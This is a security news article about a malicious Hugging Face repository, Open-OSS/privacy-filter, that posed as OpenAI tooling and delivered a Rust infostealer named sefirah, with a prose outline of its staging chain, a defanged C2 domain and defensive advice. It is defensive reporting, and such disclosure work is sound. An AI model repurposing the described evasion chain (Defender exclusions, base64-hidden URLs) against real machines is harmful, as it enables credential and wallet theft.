Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

May 10, 2026 · 9 min read

The #1 Trending Repository on Hugging Face Last Week Was Not From OpenAI—It Was a Rust Infostealer Disguised as 'Privacy Filter'

HiddenLayer's threat research team disclosed a malicious Hugging Face repository called Open-OSS/privacy-filter that ranked #1 on the platform's trending list with 244,000 downloads. The Python loader inside fetched a Rust infostealer named sefirah that drained browser logins, Discord tokens, crypto wallets, and SSH credentials—then added itself to Microsoft Defender exclusions on the way out.

A developer workstation with multiple monitors, one highlighted with a subtle red warning glow indicating a malicious software repository

What Happened

On May 7, 2026, the AI security firm HiddenLayer disclosed a malicious Hugging Face repository hosted under the name Open-OSS/privacy-filter. The repository typosquatted OpenAI's legitimate "Privacy Filter" project, and at the moment of disclosure it was sitting at the top of Hugging Face's trending list with 244,000 reported downloads.

HiddenLayer's analysts noted the download count was almost certainly inflated—padding download metrics is a common technique used by repository attackers to climb trending lists, and 244,000 downloads in days is implausible for a niche AI privacy tool. But even with significant padding, the real victim count is meaningful, because trending placement on Hugging Face is its own multiplier. Engineers and researchers actively browse the trending list looking for new tools. Once a malicious package gets there, the platform itself does the marketing.

Hugging Face removed the repository after HiddenLayer's report. The infostealer payload, which the operators named sefirah, had already done its work on every machine that pulled the package and ran it.

The Loader Chain

The malicious repository looked like a normal Python project on the surface. The bait was a file named loader.py that any user reading the README and following install instructions would run. Inside, the script executed a clean and well rehearsed staging chain:

  1. SSL verification disabled. Before any network call, the script flipped the global Python SSL context off. That removed any certificate pinning concerns the operators had about the C2 endpoint.
  2. Base64 decoded URL. The next stage URL was hidden as a base64 blob. Static scanners that grep for suspicious hostnames in source files miss anything that has been base64 obscured.
  3. JSON payload fetch. The script downloaded a JSON document containing PowerShell commands. JSON is innocuous; PowerShell delivered through JSON is a way to keep the initial Python file clean of obviously malicious strings.
  4. start.bat dropped and executed. The PowerShell commands wrote and ran a Windows batch file that performed privilege escalation and added the final payload directory to Microsoft Defender's exclusion list.
  5. sefirah deployed. With Defender out of the way, the Rust infostealer ran with elevated privileges and reached out to recargapopular[.]com for command and control.

Every step in the chain is calibrated to defeat a different defensive layer: SSL pinning, static scanning, AV, and EDR. None of the techniques are novel. What is novel is shipping the chain through Hugging Face and getting trending placement before anyone notices.

What sefirah Actually Steals

Once running, sefirah behaves like a modern Rust infostealer: fast, broad, and quiet. The targets HiddenLayer documented include:

  • Browser credentials from Chromium based browsers (Chrome, Edge, Brave, Opera) and Firefox. That covers saved passwords and cookies.
  • Discord tokens. Stolen tokens give the attacker direct access to a Discord account without needing the password or 2FA, because Discord trusts the token until it expires.
  • Cryptocurrency wallets. Both browser extension wallets (MetaMask, Phantom, and the rest) and standalone desktop wallet files. A single seed phrase from a developer's machine is enough to drain whatever balance is in it.
  • SSH, FTP, and VPN credentials. The configuration files most developers leave on disk for SSH keys, sFTP clients like FileZilla, and VPN profiles. These are the credentials that reach beyond the developer's own laptop into production infrastructure.
  • Screenshots and system fingerprints. Screenshots of the desktop at moment of compromise help operators triage which infections are valuable enough to follow up on by hand.

The Rust implementation is part of a broader 2026 trend. Operators are switching infostealers from C++ and .NET into Rust because Rust binaries are still poorly served by signature based AV, and reverse engineering them is meaningfully harder. The same shift is visible in PCPJack's credential stealer code and across the Russian speaking infostealer ecosystem.

Why Hugging Face Matters as a Distribution Channel

Hugging Face has become the default registry for AI models and tooling. It now plays the role npm plays for JavaScript and PyPI plays for Python: a place where developers reflexively grep for what they need, install whatever shows up, and run it locally. Trust is implicit because the platform is the well known one in the space.

That implicit trust is the attack surface. Hugging Face's content review for new repositories is light by design—the platform exists to make it as easy as possible for researchers to publish models—and the trending list is driven by metrics that an attacker can pad. The combination is exactly the shape that npm has been suffering from for years and that drove campaigns like TeamPCP's supply chain attack on Checkmarx, Bitwarden, and Trivy.

The fake OpenAI angle is the lure that distinguishes this campaign. Developers actively want OpenAI tooling and adjacent privacy projects, and they will install a typosquatted version without checking the org name closely. The same dynamic produced last week's fake Claude AI site pushing the Beagle trojan and the ClawHavoc AI assistant infostealer supply chain—the AI ecosystem's brand value is now the operator's preferred costume.

Why Compromised Developers Are an Email Problem

A developer infected with sefirah is not just a person whose own data is gone. The infostealer harvests browser cookies, which include authenticated sessions for the developer's email, GitHub, GitLab, AWS console, internal admin tools, and customer support systems. Cookies bypass passwords and 2FA—they are, by design, what the browser presents to a logged in service in lieu of credentials.

Operators who buy stolen cookies on the secondary market are specifically looking for active sessions in services that talk to other people. A live Gmail or Outlook session inside a corporate tenant is an entry point for business email compromise—the attacker can read the inbox, find a pending wire transfer, and reply in the victim's voice. A live customer support session is an entry point for the kind of phishing campaigns that use legitimate retailer infrastructure to send authenticated mail to customers.

Every browser cookie sefirah ships out is a candidate for that follow on. The 244,000 download number includes both real victims and inflated metrics, but a single compromised developer at the right firm is sufficient to seed a downstream phishing campaign that costs a company millions.

Defensive Steps

For developers, security teams, and anyone whose laptop ran the loader:

  • Reimage compromised machines. A Rust infostealer with Defender exclusions in place is not safe to clean with a single AV scan. The HiddenLayer guidance is to wipe and reinstall.
  • Rotate every credential the browser had access to. Email, GitHub, cloud consoles, internal admin panels. Treat saved passwords as published and any active session token as compromised. Force a logout of all sessions in identity providers.
  • Move crypto wallets to fresh seeds on a clean device. If a browser extension wallet was on the affected machine, the seed phrase is in the operator's hands.
  • Review SSH keys, FTP profiles, and VPN configurations for evidence of lateral access. Revoke and reissue keys at the bastion or directory layer.
  • Block recargapopular[.]com at egress and add the domain plus the loader script's IOCs to detection rules.
  • For org wide policy: require code review on any new dependency added from Hugging Face, npm, or PyPI. Trending placement is not a substitute for provenance, and small developer teams that adopt new AI tooling weekly are the ones a campaign like this is sized to catch.

The Pattern

The Open-OSS/privacy-filter campaign is the same playbook that has been running on npm and PyPI for three years, ported to the AI ecosystem's most trusted registry. The economics are favorable for the attacker: low cost to publish, low scrutiny on submission, and a ranking algorithm that can be padded into a top slot. The defensive economics are not. Every developer is one curl pipe to bash away from running a loader, and AI tooling is moving fast enough that even careful engineers install things they have not vetted.

Hugging Face is not the last platform this will happen on. Whatever registry hosts the next wave of agent frameworks is being scouted by the same operators today. The defensive lesson is not "do not use Hugging Face." It is to assume that any package registry which optimizes for ease of publication will eventually be one of these stories—and to harden the steps after a malicious dependency has already been pulled.

Stop Email Tracking in Gmail

Spy pixels track when you open emails, where you are, and what device you use. Gblock blocks them automatically.

Try Gblock Free for 30 Days

No credit card required. Works with Chrome, Edge, Brave, and Arc.